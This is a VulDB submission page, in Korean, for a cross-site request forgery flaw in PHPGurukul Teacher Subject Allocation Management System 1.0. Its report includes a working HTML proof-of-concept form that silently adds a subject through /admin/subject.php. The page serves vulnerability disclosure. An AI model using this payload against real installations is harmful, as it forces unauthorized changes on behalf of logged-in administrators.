제출 #248683: PHPGurukul Teacher Subject Allocation Management System 1.0 Cross Site Request Forgery정보

제목	PHPGurukul Teacher Subject Allocation Management System 1.0 Cross Site Request Forgery
설명	Hello there, My name is Dhabaleshwar Das, a cyber security researcher. I recently found a Cross Site Request Forgery (CSRF) vulnerability in Teacher Subject Allocation Management System V 1.0 . Here is the PoC below: Bug Description: A Cross Site Request Forgery (CSRF) vulnerability in "/admin/subject.php" endpoint of PHPGurukul Teacher Subject Allocation Management System 1.0 allows attackers to "Create a new Subject" via a crafted html request. Steps to Reproduce: # Exploit Title: Cross Site Request Forgery (CSRF) vulnerability in PHPGurukul Teacher Subject Allocation Management System # Date: 07-12-2023 # Exploit Author: dhabaleshwardas # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/teacher-subject-allocation-system-using-php-and-mysql/ # Version: 1.0 # Tested on: firefox/chrome/brave # CVE : To reproduce the attack: 1- Head to the http://localhost/tsas/admin/subject.php endpoint after logging into the admin account. 2- Here you can see that there is only one course added, but now we will add another course using the HTML code we have written. <html> <!-- CSRF PoC For Add Subject- by Dhabaleshwar Das --> <body> <script>history.pushState('', '', '/')</script> <form action="http://localhost/tsas/admin/subject.php" method="POST"> <input type="hidden" name="cid" value="1807" /> <input type="hidden" name="sfname" value="Maths" /> <input type="hidden" name="ssname" value="MATH" /> <input type="hidden" name="subcode" value="MA01" /> <input type="hidden" name="submit" value="" /> <input type="submit" value="Submit request" /> </form> </body> </html> 3- We'll then execute this HTML code and we successfully see that the record has been added successfully. 4- This shows that the endpoint "/admin/subject.php" is vulnerable to CSRF attack. 5- CSRF attacks can lead to unauthorized actions being performed on behalf of a user. An attacker could manipulate data within the application, leading to the creation, modification, or deletion of records.
원천	⚠️ https://github.com/dhabaleshwar/Open-Source-Vulnerabilities/blob/main/csrf_add_sub.md
사용자	dhabaleshwar (UID 58737)
제출	2023. 12. 07. AM 08:10 (2 연령 ago)
모더레이션	2023. 12. 09. PM 06:29 (2 days later)
상태	수락
VulDB 항목	247346 [PHPGurukul Teacher Subject Allocation Management System 1.0 Create a new Subject /admin/subject.php cid 교차 사이트 요청 위조]
포인트들	20

◂ 이전 개요 다음 ▸

Do you want to use VulDB in your project?

Use the official API to access entries easily!